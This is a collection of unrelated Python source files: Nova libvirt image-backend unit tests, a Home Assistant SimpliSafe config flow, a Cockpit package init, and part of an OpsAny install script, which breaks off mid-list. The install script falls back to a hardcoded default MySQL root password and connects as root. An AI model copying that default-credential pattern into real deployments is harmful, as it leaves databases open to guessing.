def test_flatten_already_flat(
self, mock_flatten, mock_parent_info, mock_log):
mock_parent_info.side_effect = exception.ImageUnacceptable(
image_id=1, reason='foo')
image = self.image_class(self.INSTANCE, self.NAME)
image.flatten()
mock_log.debug.assert_called_once()
mock_flatten.assert_not_called()
mock_parent_info.assert_called_once_with(
image.rbd_name, pool=self.POOL)
def test_import_file(self):
image = self.image_class(self.INSTANCE, self.NAME)
@mock.patch.object(image, 'exists')
@mock.patch.object(image.driver, 'remove_image')
@mock.patch.object(image.driver, 'import_image')
def _test(mock_import, mock_remove, mock_exists):
mock_exists.return_value = True
image.import_file(self.INSTANCE, mock.sentinel.file,
mock.sentinel.remote_name)
name = '%s_%s' % (self.INSTANCE.uuid,
mock.sentinel.remote_name)
mock_exists.assert_called_once_with()
mock_remove.assert_called_once_with(name)
mock_import.assert_called_once_with(mock.sentinel.file, name)
_test()
@mock.patch.object(imagebackend.Rbd, 'exists')
@mock.patch.object(rbd_utils.RBDDriver, 'remove_image')
@mock.patch.object(rbd_utils.RBDDriver, 'import_image')
def test_import_file_not_found(self, mock_import, mock_remove,
mock_exists):
image = self.image_class(self.INSTANCE, self.NAME)
mock_exists.return_value = False
image.import_file(self.INSTANCE, mock.sentinel.file,
mock.sentinel.remote_name)
name = '%s_%s' % (self.INSTANCE.uuid,
mock.sentinel.remote_name)
mock_exists.assert_called_once_with()
self.assertFalse(mock_remove.called)
mock_import.assert_called_once_with(mock.sentinel.file, name)
def test_get_parent_pool(self):
image = self.image_class(self.INSTANCE, self.NAME)
with mock.patch.object(rbd_utils.RBDDriver, 'parent_info') as mock_pi:
mock_pi.return_value = [self.POOL, 'fake-image', 'fake-snap']
parent_pool = image._get_parent_pool(self.CONTEXT, 'fake-image',
self.FSID)
self.assertEqual(self.POOL, parent_pool)
def test_get_parent_pool_no_parent_info(self):
image = self.image_class(self.INSTANCE, self.NAME)
rbd_uri = 'rbd://%s/%s/fake-image/fake-snap' % (self.FSID, self.POOL)
with test.nested(mock.patch.object(rbd_utils.RBDDriver, 'parent_info'),
mock.patch.object(imagebackend.IMAGE_API, 'get'),
) as (mock_pi, mock_get):
mock_pi.side_effect = exception.ImageUnacceptable(image_id='test',
reason='test')
mock_get.return_value = {'locations': [{'url': rbd_uri}]}
parent_pool = image._get_parent_pool(self.CONTEXT, 'fake-image',
self.FSID)
self.assertEqual(self.POOL, parent_pool)
def test_get_parent_pool_non_local_image(self):
image = self.image_class(self.INSTANCE, self.NAME)
rbd_uri = 'rbd://remote-cluster/remote-pool/fake-image/fake-snap'
with test.nested(
mock.patch.object(rbd_utils.RBDDriver, 'parent_info'),
mock.patch.object(imagebackend.IMAGE_API, 'get')
) as (mock_pi, mock_get):
mock_pi.side_effect = exception.ImageUnacceptable(image_id='test',
reason='test')
mock_get.return_value = {'locations': [{'url': rbd_uri}]}
self.assertRaises(exception.ImageUnacceptable,
image._get_parent_pool, self.CONTEXT,
'fake-image', self.FSID)
def test_direct_snapshot(self):
image = self.image_class(self.INSTANCE, self.NAME)
test_snap = 'rbd://%s/%s/fake-image-id/snap' % (self.FSID, self.POOL)
with test.nested(
mock.patch.object(rbd_utils.RBDDriver, 'get_fsid',
return_value=self.FSID),
mock.patch.object(image, '_get_parent_pool',
return_value=self.POOL),
mock.patch.object(rbd_utils.RBDDriver, 'create_snap'),
mock.patch.object(rbd_utils.RBDDriver, 'clone'),
mock.patch.object(rbd_utils.RBDDriver, 'flatten'),
mock.patch.object(image, 'cleanup_direct_snapshot')
) as (mock_fsid, mock_parent, mock_create_snap, mock_clone,
mock_flatten, mock_cleanup):
location = image.direct_snapshot(self.CONTEXT, 'fake-snapshot',
'fake-format', 'fake-image-id',
'fake-base-image')
mock_fsid.assert_called_once_with()
mock_parent.assert_called_once_with(self.CONTEXT,
'fake-base-image',
self.FSID)
mock_create_snap.assert_has_calls([mock.call(image.rbd_name,
'fake-snapshot',
protect=True),
mock.call('fake-image-id',
'snap',
pool=self.POOL,
protect=True)])
mock_clone.assert_called_once_with(mock.ANY, 'fake-image-id',
dest_pool=self.POOL)
mock_flatten.assert_called_once_with('fake-image-id',
pool=self.POOL)
mock_cleanup.assert_called_once_with(mock.ANY)
self.assertEqual(test_snap, location)
def test_direct_snapshot_cleans_up_on_failures(self):
image = self.image_class(self.INSTANCE, self.NAME)
test_snap = 'rbd://%s/%s/%s/snap' % (self.FSID, image.driver.pool,
image.rbd_name)
with test.nested(
mock.patch.object(rbd_utils.RBDDriver, 'get_fsid',
return_value=self.FSID),
mock.patch.object(image, '_get_parent_pool',
return_value=self.POOL),
mock.patch.object(rbd_utils.RBDDriver, 'create_snap'),
mock.patch.object(rbd_utils.RBDDriver, 'clone',
side_effect=exception.Forbidden('testing')),
mock.patch.object(rbd_utils.RBDDriver, 'flatten'),
mock.patch.object(image, 'cleanup_direct_snapshot')) as (
mock_fsid, mock_parent, mock_create_snap, mock_clone,
mock_flatten, mock_cleanup):
self.assertRaises(exception.Forbidden, image.direct_snapshot,
self.CONTEXT, 'snap', 'fake-format',
'fake-image-id', 'fake-base-image')
mock_create_snap.assert_called_once_with(image.rbd_name, 'snap',
protect=True)
self.assertFalse(mock_flatten.called)
mock_cleanup.assert_called_once_with(dict(url=test_snap))
def test_cleanup_direct_snapshot(self):
image = self.image_class(self.INSTANCE, self.NAME)
test_snap = 'rbd://%s/%s/%s/snap' % (self.FSID, image.driver.pool,
image.rbd_name)
with test.nested(
mock.patch.object(rbd_utils.RBDDriver, 'remove_snap'),
mock.patch.object(rbd_utils.RBDDriver, 'destroy_volume')
) as (mock_rm, mock_destroy):
# Ensure that the method does nothing when no location is provided
image.cleanup_direct_snapshot(None)
self.assertFalse(mock_rm.called)
# Ensure that destroy_volume is not called
image.cleanup_direct_snapshot(dict(url=test_snap))
mock_rm.assert_called_once_with(image.rbd_name, 'snap', force=True,
ignore_errors=False,
pool=image.driver.pool)
self.assertFalse(mock_destroy.called)
def test_cleanup_direct_snapshot_destroy_volume(self):
image = self.image_class(self.INSTANCE, self.NAME)
test_snap = 'rbd://%s/%s/%s/snap' % (self.FSID, image.driver.pool,
image.rbd_name)
with test.nested(
mock.patch.object(rbd_utils.RBDDriver, 'remove_snap'),
mock.patch.object(rbd_utils.RBDDriver, 'destroy_volume')
) as (mock_rm, mock_destroy):
# Ensure that destroy_volume is called
image.cleanup_direct_snapshot(dict(url=test_snap),
also_destroy_volume=True)
mock_rm.assert_called_once_with(image.rbd_name, 'snap',
force=True,
ignore_errors=False,
pool=image.driver.pool)
mock_destroy.assert_called_once_with(image.rbd_name,
pool=image.driver.pool)
@mock.patch('nova.virt.libvirt.imagebackend.IMAGE_API')
def test_copy_to_store(self, mock_imgapi):
# Test copy_to_store() happy path where we ask for the image
# to be copied, it goes into progress and then completes.
self.flags(images_rbd_glance_copy_poll_interval=0,
group='libvirt')
self.flags(images_rbd_glance_store_name='store',
group='libvirt')
image = self.image_class(self.INSTANCE, self.NAME)
mock_imgapi.get.side_effect = [
# Simulate a race between starting the copy and the first poll
{'stores': []},
# Second poll shows it in progress
{'os_glance_importing_to_stores': ['store'],
'stores': []},
# Third poll shows it has also been copied to a non-local store
{'os_glance_importing_to_stores': ['store'],
'stores': ['other']},
# Should-be-last poll shows it complete
{'os_glance_importing_to_stores': [],
'stores': ['other', 'store']},
]
image.copy_to_store(self.CONTEXT, {'id': 'foo'})
mock_imgapi.copy_image_to_store.assert_called_once_with(
self.CONTEXT, 'foo', 'store')
self.assertEqual(4, mock_imgapi.get.call_count)
@mock.patch('nova.virt.libvirt.imagebackend.IMAGE_API')
def test_copy_to_store_race_with_existing(self, mock_imgapi):
# Test copy_to_store() where we race to ask Glance to do the
# copy with another node. One of us will get a BadRequest, which
# should not cause us to fail. If our desired store is now
# in progress, continue to wait like we would have if we had
# won the race.
self.flags(images_rbd_glance_copy_poll_interval=0,
group='libvirt')
self.flags(images_rbd_glance_store_name='store',
group='libvirt')
image = self.image_class(self.INSTANCE, self.NAME)
mock_imgapi.copy_image_to_store.side_effect = (
exception.ImageBadRequest(image_id='foo',
response='already in progress'))
# Make the first poll indicate that the image has already
# been copied
mock_imgapi.get.return_value = {'stores': ['store', 'other']}
# Despite the (expected) exception from the copy, we should
# not raise here if the subsequent poll works.
image.copy_to_store(self.CONTEXT, {'id': 'foo'})
mock_imgapi.get.assert_called_once_with(self.CONTEXT,
'foo',
include_locations=True)
mock_imgapi.copy_image_to_store.assert_called_once_with(
self.CONTEXT, 'foo', 'store')
@mock.patch('nova.virt.libvirt.imagebackend.IMAGE_API')
def test_copy_to_store_import_impossible(self, mock_imgapi):
# Test copy_to_store() where Glance tells us that the image
# is not copy-able for some reason (like it is not active yet
# or some other workflow reason).
image = self.image_class(self.INSTANCE, self.NAME)
mock_imgapi.copy_image_to_store.side_effect = (
exception.ImageImportImpossible(image_id='foo',
reason='because tests'))
self.assertRaises(exception.ImageUnacceptable,
image.copy_to_store,
self.CONTEXT, {'id': 'foo'})
@mock.patch('nova.virt.libvirt.imagebackend.IMAGE_API')
def test_copy_to_store_import_failed_other_reason(self, mock_imgapi):
# Test copy_to_store() where some unexpected failure gets raised.
# We should bubble that up so it gets all the way back to the caller
# of the clone() itself, which can handle it independent of one of
# the image-specific exceptions.
image = self.image_class(self.INSTANCE, self.NAME)
mock_imgapi.copy_image_to_store.side_effect = test.TestingException
# Make sure any other exception makes it through, as those are already
# expected failures by the callers of the imagebackend code.
self.assertRaises(test.TestingException,
image.copy_to_store,
self.CONTEXT, {'id': 'foo'})
@mock.patch('nova.virt.libvirt.imagebackend.IMAGE_API')
def test_copy_to_store_import_failed_in_progress(self, mock_imgapi):
# Test copy_to_store() in the situation where we ask for the copy,
# things start to look good (in progress) and later get reported
# as failed.
self.flags(images_rbd_glance_copy_poll_interval=0,
group='libvirt')
self.flags(images_rbd_glance_store_name='store',
group='libvirt')
image = self.image_class(self.INSTANCE, self.NAME)
mock_imgapi.get.side_effect = [
# First poll shows it in progress
{'os_glance_importing_to_stores': ['store'],
'stores': []},
# Second poll shows it failed
{'os_glance_failed_import': ['store'],
'stores': []},
]
exc = self.assertRaises(exception.ImageUnacceptable,
image.copy_to_store,
self.CONTEXT, {'id': 'foo'})
self.assertIn('unsuccessful because', str(exc))
@mock.patch.object(loopingcall.FixedIntervalWithTimeoutLoopingCall,
'start')
@mock.patch('nova.virt.libvirt.imagebackend.IMAGE_API')
def test_copy_to_store_import_failed_timeout(self, mock_imgapi,
mock_timer_start):
# Test copy_to_store() simulating the case where we timeout waiting
# for Glance to do the copy.
self.flags(images_rbd_glance_store_name='store',
group='libvirt')
image = self.image_class(self.INSTANCE, self.NAME)
mock_timer_start.side_effect = loopingcall.LoopingCallTimeOut()
exc = self.assertRaises(exception.ImageUnacceptable,
image.copy_to_store,
self.CONTEXT, {'id': 'foo'})
self.assertIn('timed out', str(exc))
mock_imgapi.copy_image_to_store.assert_called_once_with(
self.CONTEXT, 'foo', 'store')
@mock.patch('nova.storage.rbd_utils.RBDDriver')
@mock.patch('nova.virt.libvirt.imagebackend.IMAGE_API')
def test_clone_copy_to_store(self, mock_imgapi, mock_driver_):
# Call image.clone() in a way that will cause it to fall through
# the locations check to the copy-to-store behavior, and assert
# that after the copy, we recurse (without becoming infinite) and
# do the check again.
self.flags(images_rbd_glance_store_name='store', group='libvirt')
fake_image = {
'id': 'foo',
'disk_format': 'raw',
'locations': ['fake'],
}
mock_imgapi.get.return_value = fake_image
mock_driver = mock_driver_.return_value
mock_driver.is_cloneable.side_effect = [False, True]
image = self.image_class(self.INSTANCE, self.NAME)
with mock.patch.object(image, 'copy_to_store') as mock_copy:
image.clone(self.CONTEXT, 'foo')
mock_copy.assert_called_once_with(self.CONTEXT, fake_image)
mock_driver.is_cloneable.assert_has_calls([
# First call is the initial check
mock.call('fake', fake_image),
# Second call with the same location must be because we
# recursed after the copy-to-store operation
mock.call('fake', fake_image)])
@mock.patch('nova.storage.rbd_utils.RBDDriver')
@mock.patch('nova.virt.libvirt.imagebackend.IMAGE_API')
def test_clone_copy_to_store_failed(self, mock_imgapi, mock_driver_):
# Call image.clone() in a way that will cause it to fall through
# the locations check to the copy-to-store behavior, but simulate
# some situation where we didn't actually copy the image and the
# recursed check does not succeed. Assert that we do not copy again,
# nor recurse again, and raise the expected error.
self.flags(images_rbd_glance_store_name='store', group='libvirt')
fake_image = {
'id': 'foo',
'disk_format': 'raw',
'locations': ['fake'],
}
mock_imgapi.get.return_value = fake_image
mock_driver = mock_driver_.return_value
mock_driver.is_cloneable.side_effect = [False, False]
image = self.image_class(self.INSTANCE, self.NAME)
with mock.patch.object(image, 'copy_to_store') as mock_copy:
self.assertRaises(exception.ImageUnacceptable,
image.clone, self.CONTEXT, 'foo')
mock_copy.assert_called_once_with(self.CONTEXT, fake_image)
mock_driver.is_cloneable.assert_has_calls([
# First call is the initial check
mock.call('fake', fake_image),
# Second call with the same location must be because we
# recursed after the copy-to-store operation
mock.call('fake', fake_image)])
@mock.patch('nova.storage.rbd_utils.RBDDriver')
@mock.patch('nova.virt.libvirt.imagebackend.IMAGE_API')
def test_clone_without_needed_copy(self, mock_imgapi, mock_driver_):
# Call image.clone() in a way that will cause it to pass the locations
# check the first time. Assert that we do not call copy-to-store
# nor recurse.
self.flags(images_rbd_glance_store_name='store', group='libvirt')
fake_image = {
'id': 'foo',
'disk_format': 'raw',
'locations': ['fake'],
}
mock_imgapi.get.return_value = fake_image
mock_driver = mock_driver_.return_value
mock_driver.is_cloneable.return_value = True
image = self.image_class(self.INSTANCE, self.NAME)
with mock.patch.object(image, 'copy_to_store') as mock_copy:
image.clone(self.CONTEXT, 'foo')
mock_copy.assert_not_called()
mock_driver.is_cloneable.assert_called_once_with('fake', fake_image)
@mock.patch('nova.storage.rbd_utils.RBDDriver')
@mock.patch('nova.virt.libvirt.imagebackend.IMAGE_API')
def test_clone_copy_not_configured(self, mock_imgapi, mock_driver_):
# Call image.clone() in a way that will cause it to fail the locations
# check the first time. Assert that if the store name is not configured
# we do not try to copy-to-store and just raise the original exception
# indicating that the image is not reachable.
fake_image = {
'id': 'foo',
'disk_format': 'raw',
'locations': ['fake'],
}
mock_imgapi.get.return_value = fake_image
mock_driver = mock_driver_.return_value
mock_driver.is_cloneable.return_value = False
image = self.image_class(self.INSTANCE, self.NAME)
with mock.patch.object(image, 'copy_to_store') as mock_copy:
self.assertRaises(exception.ImageUnacceptable,
image.clone, self.CONTEXT, 'foo')
mock_copy.assert_not_called()
mock_driver.is_cloneable.assert_called_once_with('fake', fake_image)
class PloopTestCase(_ImageTestCase, test.NoDBTestCase):
SIZE = 1024
def setUp(self):
self.image_class = imagebackend.Ploop
super(PloopTestCase, self).setUp()
self.utils = imagebackend.utils
@mock.patch.object(imagebackend.fileutils, 'ensure_tree')
@mock.patch.object(os.path, 'exists')
def test_cache(self, mock_exists, mock_ensure):
mock_exists.side_effect = [False, False, False]
exist_calls = [mock.call(self.TEMPLATE_DIR),
mock.call(self.PATH), mock.call(self.TEMPLATE_PATH)]
fn = mock.MagicMock()
image = self.image_class(self.INSTANCE, self.NAME)
self.mock_create_image(image)
image.cache(fn, self.TEMPLATE)
mock_ensure.assert_called_once_with(self.TEMPLATE_DIR)
mock_exists.assert_has_calls(exist_calls)
fn.assert_called_once_with(target=self.TEMPLATE_PATH)
@mock.patch.object(imagebackend.Ploop, 'get_disk_size',
return_value=2048)
@mock.patch.object(imagebackend.utils, 'synchronized')
@mock.patch('nova.virt.libvirt.utils.copy_image')
@mock.patch('nova.privsep.libvirt.ploop_restore_descriptor')
@mock.patch.object(imagebackend.disk, 'extend')
def test_create_image(self, mock_extend, mock_ploop_restore_descriptor,
mock_copy, mock_sync, mock_get):
mock_sync.side_effect = lambda *a, **kw: self._fake_deco
fn = mock.MagicMock()
img_path = os.path.join(self.PATH, "root.hds")
image = self.image_class(self.INSTANCE, self.NAME)
image.create_image(fn, self.TEMPLATE_PATH, 2048, image_id=None)
mock_copy.assert_called_once_with(self.TEMPLATE_PATH, img_path)
mock_ploop_restore_descriptor.assert_called_once_with(self.PATH,
img_path,
"raw")
self.assertTrue(mock_sync.called)
fn.assert_called_once_with(target=self.TEMPLATE_PATH, image_id=None)
mock_extend.assert_called_once_with(
imgmodel.LocalFileImage(self.PATH, imgmodel.FORMAT_PLOOP),
2048)
def test_create_image_generated(self):
fn = mock.Mock()
image = self.image_class(self.INSTANCE, self.NAME)
image.create_image(fn, self.TEMPLATE_PATH, 2048, ephemeral_size=2)
fn.assert_called_with(target=self.PATH,
ephemeral_size=2)
def test_prealloc_image(self):
self.flags(preallocate_images='space')
fake_processutils.fake_execute_clear_log()
fake_processutils.stub_out_processutils_execute(self)
image = self.image_class(self.INSTANCE, self.NAME)
def fake_fetch(target, *args, **kwargs):
return
self.stub_out('os.path.exists', lambda _: True)
self.stub_out('nova.virt.libvirt.imagebackend.Ploop.exists',
lambda *a, **kw: True)
self.stub_out('nova.virt.libvirt.imagebackend.Ploop.get_disk_size',
lambda *a, **kw: self.SIZE)
image.cache(fake_fetch, self.TEMPLATE_PATH, self.SIZE)
class BackendTestCase(test.NoDBTestCase):
INSTANCE = objects.Instance(id=1, uuid=uuidutils.generate_uuid())
NAME = 'fake-name.suffix'
def setUp(self):
super(BackendTestCase, self).setUp()
self.flags(enabled=False, group='ephemeral_storage_encryption')
self.flags(instances_path=self.useFixture(fixtures.TempDir()).path)
self.INSTANCE['ephemeral_key_uuid'] = None
def get_image(self, use_cow, image_type):
return imagebackend.Backend(use_cow).by_name(self.INSTANCE, self.NAME,
image_type)
def _test_image(self, image_type, image_not_cow, image_cow):
image1 = self.get_image(False, image_type)
image2 = self.get_image(True, image_type)
def assertIsInstance(instance, class_object):
failure = ('Expected %s,' +
' but got %s.') % (class_object.__name__,
instance.__class__.__name__)
self.assertIsInstance(instance, class_object, msg=failure)
assertIsInstance(image1, image_not_cow)
assertIsInstance(image2, image_cow)
def test_image_flat(self):
self._test_image('raw', imagebackend.Flat, imagebackend.Flat)
def test_image_flat_preallocate_images(self):
self.flags(preallocate_images='space')
raw = imagebackend.Flat(self.INSTANCE, 'fake_disk', '/tmp/xyz')
self.assertTrue(raw.preallocate)
def test_image_flat_native_io(self):
self.flags(preallocate_images="space")
raw = imagebackend.Flat(self.INSTANCE, 'fake_disk', '/tmp/xyz')
self.assertEqual(raw.driver_io, "native")
def test_image_qcow2(self):
self._test_image('qcow2', imagebackend.Qcow2, imagebackend.Qcow2)
def test_image_qcow2_preallocate_images(self):
self.flags(preallocate_images='space')
qcow = imagebackend.Qcow2(self.INSTANCE, 'fake_disk', '/tmp/xyz')
self.assertTrue(qcow.preallocate)
def test_image_qcow2_native_io(self):
self.flags(preallocate_images="space")
qcow = imagebackend.Qcow2(self.INSTANCE, 'fake_disk', '/tmp/xyz')
self.assertEqual(qcow.driver_io, "native")
def test_image_lvm_native_io(self):
def _test_native_io(is_sparse, driver_io):
self.flags(images_volume_group='FakeVG', group='libvirt')
self.flags(sparse_logical_volumes=is_sparse, group='libvirt')
lvm = imagebackend.Lvm(self.INSTANCE, 'fake_disk')
self.assertEqual(lvm.driver_io, driver_io)
_test_native_io(is_sparse=False, driver_io="native")
_test_native_io(is_sparse=True, driver_io=None)
def test_image_lvm(self):
self.flags(images_volume_group='FakeVG', group='libvirt')
self._test_image('lvm', imagebackend.Lvm, imagebackend.Lvm)
@mock.patch.object(rbd_utils, 'rbd')
@mock.patch.object(rbd_utils, 'rados')
def test_image_rbd(self, mock_rados, mock_rbd):
conf = "FakeConf"
pool = "FakePool"
self.flags(images_rbd_pool=pool, group='libvirt')
self.flags(images_rbd_ceph_conf=conf, group='libvirt')
self._test_image('rbd', imagebackend.Rbd, imagebackend.Rbd)
def test_image_default(self):
self._test_image('default', imagebackend.Flat, imagebackend.Qcow2)
class UtimeWorkaroundTestCase(test.NoDBTestCase):
ERROR_STUB = "sentinel.path: [Errno 13] Permission Denied"
def setUp(self):
super(UtimeWorkaroundTestCase, self).setUp()
self.mock_utime = self.useFixture(
fixtures.MockPatch('nova.privsep.path.utime')).mock
def test_update_utime_no_error(self):
# If utime doesn't raise an error we shouldn't raise or log anything
imagebackend._update_utime_ignore_eacces(mock.sentinel.path)
self.mock_utime.assert_called_once_with(mock.sentinel.path)
self.assertNotIn(self.ERROR_STUB, self.stdlog.logger.output)
def test_update_utime_eacces(self):
# If utime raises EACCES we should log the error, but ignore it
e = OSError()
e.errno = errno.EACCES
e.strerror = "Permission Denied"
self.mock_utime.side_effect = e
imagebackend._update_utime_ignore_eacces(mock.sentinel.path)
self.mock_utime.assert_called_once_with(mock.sentinel.path)
self.assertIn(self.ERROR_STUB, self.stdlog.logger.output)
def test_update_utime_eio(self):
# If utime raises any other error we should raise it
e = OSError()
e.errno = errno.EIO
e.strerror = "IO Error"
self.mock_utime.side_effect = e
ex = self.assertRaises(
OSError, imagebackend._update_utime_ignore_eacces,
mock.sentinel.path)
self.assertIs(ex, e)
self.mock_utime.assert_called_once_with(mock.sentinel.path)
self.assertNotIn(self.ERROR_STUB, self.stdlog.logger.output)
|
"""Config flow to configure the SimpliSafe component."""
from simplipy import API
from simplipy.errors import SimplipyError
import voluptuous as vol
from homeassistant import config_entries
from homeassistant.const import CONF_CODE, CONF_PASSWORD, CONF_TOKEN, CONF_USERNAME
from homeassistant.core import callback
from homeassistant.helpers import aiohttp_client
from .const import DOMAIN # pylint: disable=unused-import
class SimpliSafeFlowHandler(config_entries.ConfigFlow, domain=DOMAIN):
"""Handle a SimpliSafe config flow."""
VERSION = 1
CONNECTION_CLASS = config_entries.CONN_CLASS_CLOUD_POLL
def __init__(self):
"""Initialize the config flow."""
self.data_schema = vol.Schema(
{
vol.Required(CONF_USERNAME): str,
vol.Required(CONF_PASSWORD): str,
vol.Optional(CONF_CODE): str,
}
)
async def _show_form(self, errors=None):
"""Show the form to the user."""
return self.async_show_form(
step_id="user",
data_schema=self.data_schema,
errors=errors if errors else {},
)
@staticmethod
@callback
def async_get_options_flow(config_entry):
"""Define the config flow to handle options."""
return SimpliSafeOptionsFlowHandler(config_entry)
async def async_step_import(self, import_config):
"""Import a config entry from configuration.yaml."""
return await self.async_step_user(import_config)
async def async_step_user(self, user_input=None):
"""Handle the start of the config flow."""
if not user_input:
return await self._show_form()
await self.async_set_unique_id(user_input[CONF_USERNAME])
self._abort_if_unique_id_configured()
websession = aiohttp_client.async_get_clientsession(self.hass)
try:
simplisafe = await API.login_via_credentials(
user_input[CONF_USERNAME], user_input[CONF_PASSWORD], websession
)
except SimplipyError:
return await self._show_form(errors={"base": "invalid_credentials"})
return self.async_create_entry(
title=user_input[CONF_USERNAME],
data={
CONF_USERNAME: user_input[CONF_USERNAME],
CONF_TOKEN: simplisafe.refresh_token,
CONF_CODE: user_input.get(CONF_CODE),
},
)
class SimpliSafeOptionsFlowHandler(config_entries.OptionsFlow):
"""Handle a SimpliSafe options flow."""
def __init__(self, config_entry):
"""Initialize."""
self.config_entry = config_entry
async def async_step_init(self, user_input=None):
"""Manage the options."""
if user_input is not None:
return self.async_create_entry(title="", data=user_input)
return self.async_show_form(
step_id="init",
data_schema=vol.Schema(
{
vol.Optional(
CONF_CODE, default=self.config_entry.options.get(CONF_CODE),
): str
}
),
)
|
"""Init for Cockpit."""
from pkg_resources import DistributionNotFound, get_distribution
from cockpit.cockpit import Cockpit
from cockpit.plotter import CockpitPlotter
# Extract the version number, for accessing it via __version__
try:
# Change here if project is renamed and does not equal the package name
dist_name = __name__
__version__ = get_distribution(dist_name).version
except DistributionNotFound:
__version__ = "unknown"
finally:
del get_distribution, DistributionNotFound
__all__ = ["Cockpit", "CockpitPlotter", "__version__", "cockpit.quantities"]
|
"""
mysql-connector==2.2.9
SQLAlchemy==1.4.22
"""
import os
import sys
import datetime
import configparser
from sqlalchemy import Column, DateTime, ForeignKey, String, create_engine, Index
from sqlalchemy.dialects.mysql import INTEGER, LONGTEXT, SMALLINT, TINYINT
from sqlalchemy.orm import relationship, sessionmaker
from sqlalchemy.ext.declarative import declarative_base
from urllib import parse
# change dir to install
os.chdir('../install')
# testify file if exists
if not os.path.exists('install.config'):
sys.exit('install config is not exists.')
read_install_config = configparser.ConfigParser()
try:
read_install_config.read('install.config')
config_dict = dict(read_install_config)
except Exception as e:
print(e)
sys.exit('file context is wrong.')
def replace_str(data):
if not data:
return None
return data.replace("\"", "").replace("\'", "")
MYSQL_SERVER_IP = replace_str(config_dict.get('mysql').get("MYSQL_SERVER_IP", "127.0.0.1"))
MYSQL_ROOT_PASSWORD = replace_str(config_dict.get("mysql").get("MYSQL_ROOT_PASSWORD", "OpsAny@2020"))
try:
db = create_engine("mysql+mysqlconnector://root:{}@{}/opsany_paas".format(parse.quote_plus(MYSQL_ROOT_PASSWORD), MYSQL_SERVER_IP))
Base = declarative_base(db)
def to_dict(self):
return {c.name: getattr(self, c.name, None)
for c in self.__table__.columns}
Base.to_dict = to_dict
except Exception as e:
print("Script error: {}".format(str(e)))
sys.exit('connect sql is failed. Please check mysql server!')
envs = [
{
"app_code": "cmdb",
"env": [
# CMDB count 8
{"key": "UPLOAD_PATH", "value": replace_str(config_dict.get('opsany_saas').get("UPLOAD_PATH")), "env_scope": "all", "intro": "uploads path"},
{"key": "MYSQL_PASSWORD", "value": replace_str(config_dict.get('mysql').get("MYSQL_OPSANY_CMDB_PASSWORD")), "env_scope": "all", "intro": "mysql password"},
{"key": "MYSQL_HOST", "value": replace_str(config_dict.get('mysql').get("MYSQL_SERVER_IP")), "env_scope": "all", "intro": "mysql host"},
{"key": "MYSQL_PORT", "value": replace_str(config_dict.get('mysql').get("MYSQL_PORT")), "env_scope": "all", "intro": "mysql port"},
{"key": "MONGO_HOST", "value": replace_str(config_dict.get('mongodb').get("MONGO_SERVER_IP")), "env_scope": "all", "intro": "mongo host"},
{"key": "MONGO_PORT", "value": replace_str(config_dict.get('mongodb').get("MONGO_PORT")), "env_scope": "all", "intro": "mongo port"},
{"key": "MONGO_PASSWORD", "value": replace_str(config_dict.get('mongodb').get("MONGO_CMDB_PASSWORD")), "env_scope": "all", "intro": "mongo password"},
# {"key": "DEFAULT_USER_ICON", "value": read_install_config.get("DEFAULT_USER_ICON"), "env_scope": "all", "intro": "user default icon"},
]
},{
"app_code": "cmp",
"env": [
# CMP count 7
{"key": "MYSQL_PASSWORD", "value": replace_str(config_dict.get('mysql').get("MYSQL_OPSANY_CMP_PASSWORD")), "env_scope": "all", "intro": "mysql password"},
{"key": "MYSQL_HOST", "value": replace_str(config_dict.get('mysql').get("MYSQL_SERVER_IP")), "env_scope": "all", "intro": "mysql host"},
{"key": "MYSQL_PORT", "value": replace_str(config_dict.get('mysql').get("MYSQL_PORT")), "env_scope": "all", "intro": "mysql port"},
{"key": "MONGO_HOST", "value": replace_str(config_dict.get('mongodb').get("MONGO_SERVER_IP")), "env_scope": "all", "intro": "mongo host"},
{"key": "MONGO_PORT", "value": replace_str(config_dict.get('mongodb').get("MONGO_PORT")), "env_scope": "all", "intro": "mongo port"},
{"key": "MONGO_PASSWORD", "value": replace_str(config_dict.get('mongodb').get("MONGO_CMP_PASSWORD")), "env_scope": "all", "intro": "mongo password"},
# {"key": "DEFAULT_USER_ICON", "value": read_install_config.get("DEFAULT_USER_ICON"), "env_scope": "all", "intro": "user default icon"},
]
},{
"app_code": "job",
"env": [
# JOB count 10
{"key": "UPLOAD_PATH", "value": replace_str(config_dict.get('opsany_saas').get("UPLOAD_PATH")), "env_scope": "all", "intro": "uploads path"},
{"key": "MYSQL_PASSWORD", "value": replace_str(config_dict.get('mysql').get("MYSQL_OPSANY_JOB_PASSWORD")), "env_scope": "all", "intro": "mysql password"},
{"key": "MYSQL_HOST", "value": replace_str(config_dict.get('mysql').get("MYSQL_SERVER_IP")), "env_scope": "all", "intro": "mysql host"},
{"key": "MYSQL_PORT", "value": replace_str(config_dict.get('mysql').get("MYSQL_PORT")), "env_scope": "all", "intro": "mysql port"},
{"key": "FILE_ROOT", "value": replace_str(config_dict.get('opsany_saas').get("FILE_ROOT")), "env_scope": "all", "intro": "Salt file root"},
{"key": "PILLAR_ROOT", "value": replace_str(config_dict.get('opsany_saas').get("PILLAR_ROOT")), "env_scope": "all", "intro": "Salt pillar root"},
{"key": "MONGO_HOST", "value": replace_str(config_dict.get('mongodb').get("MONGO_SERVER_IP")), "env_scope": "all", "intro": "mongo host"},
{"key": "MONGO_PORT", "value": replace_str(config_dict.get('mongodb').get("MONGO_PORT")), "env_scope": "all", "intro": "mongo port"},
{"key": "MONGO_PASSWORD", "value": replace_str(config_dict.get('mongodb').get("MONGO_JOB_PASSWORD")), "env_scope": "all", "intro": "mongo password"},
{"key": "REDIS_HOST", "value": replace_str(config_dict.get("redis").get("REDIS_SERVER_IP")), "env_scope": "all", "intro": "redis host"},
{"key": "REDIS_PORT", "value": replace_str(config_dict.get("redis").get("REDIS_PORT")), "env_scope": "all", "intro": "redis port"},
{"key": "REDIS_PASSWORD", "value": replace_str(config_dict.get("redis").get("REDIS_SERVER_PASSWORD")), "env_scope": "all", "intro": "redis password"},
# {"key": "DEFAULT_USER_ICON", "value": read_install_config.get("DEFAULT_USER_ICON"), "env_scope": "all", "intro": "user default icon"},
]
},{
"app_code": "workbench",
"env": [
# WORKBENCH count 7
{"key": "UPLOAD_PATH", "value": replace_str(config_dict.get('opsany_saas').get("UPLOAD_PATH")), "env_scope": "all", "intro": "uploads path"},
{"key": "MYSQL_PASSWORD", "value": replace_str(config_dict.get('mysql').get("MYSQL_OPSANY_WORKBENCH_PASSWORD")), "env_scope": "all", "intro": "mysql password"},
{"key": "MYSQL_HOST", "value": replace_str(config_dict.get('mysql').get("MYSQL_SERVER_IP")), "env_scope": "all", "intro": "mysql host"},
